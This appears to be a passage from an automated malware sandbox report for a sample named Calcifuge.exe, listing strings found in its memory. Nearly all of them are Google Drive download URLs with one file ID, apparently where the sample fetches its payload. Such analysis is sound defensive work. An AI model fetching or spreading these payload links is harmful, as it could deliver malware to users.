00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Z
      Source: Calcifuge.exe, 00000006.00000003.2674274316.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2662875760.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Z.
      Source: Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/_1
      Source: Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ificate
      Source: Calcifuge.exe, 00000006.00000003.2148548358.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/j.
      Source: Calcifuge.exe, 00000006.00000003.2880880177.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2858542036.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r.
      Source: Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=do
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2640013882.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457734111.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2662875760.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2617552588.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2629105429.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/s
      Source: Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2801689509.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o
      Source: Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o0062&M
      Source: Calcifuge.exe, 00000006.00000002.2918740581.000000000234E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o3
      Source: Calcifuge.exe, 00000006.00000002.2918740581.000000000234E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o:
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o=
      Source: Calcifuge.exe, 00000006.00000002.2918740581.000000000234E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3oF
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3oKL?
      Source: Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2125585019.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2342872885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2320749731.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2136830469.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3oVN
      Source: Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2342872885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2320749731.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3oX
      Source: Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2125585019.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2136830469.00000000023B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3oib2
      Source: Calcifuge.exe, 00000006.00000002.2918740581.000000000234E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3ol
      Source: Calcifuge.exe, 00000006.00000002.2918740581.000000000234E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3op#
      Source: Calcifuge.exe, 00000006.00000003.2629105429.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: Calcifuge.exe, 00000006.00000002.2918740581.0000000002389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/;
      Source: Calcifuge.exe, 00000006.00000002.2918740581.0000000002389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/J
      Source: Calcifuge.exe, 00000006.00000003.2228056370.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/P%
      Source: Calcifuge.exe, 00000006.00000003.2685599217.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKA
      Source: Calcifuge.exe, 00000006.00000003.2756287431.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537372471.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2629105429.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2640013882.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download(
      Source: Calcifuge.exe, 00000006.00000002.2918854097.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2916937010.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download.
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2880880177.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000002.2918854097.00000000023B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download0
      Source: Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2571402123.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2503130227.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2548701285.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514842468.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download11
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download4
      Source: Calcifuge.exe, 00000006.00000003.2320749731.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download=
      Source: Calcifuge.exe, 00000006.00000002.2918740581.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388099706.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423966470.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446693739.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480466093.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492229148.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560467511.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2503220096.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2435085911.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171207372.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457842800.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469322168.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514911101.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2548755171.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526085908.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400372513.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537547087.00000000023A2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2412221349.00000000023A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadD
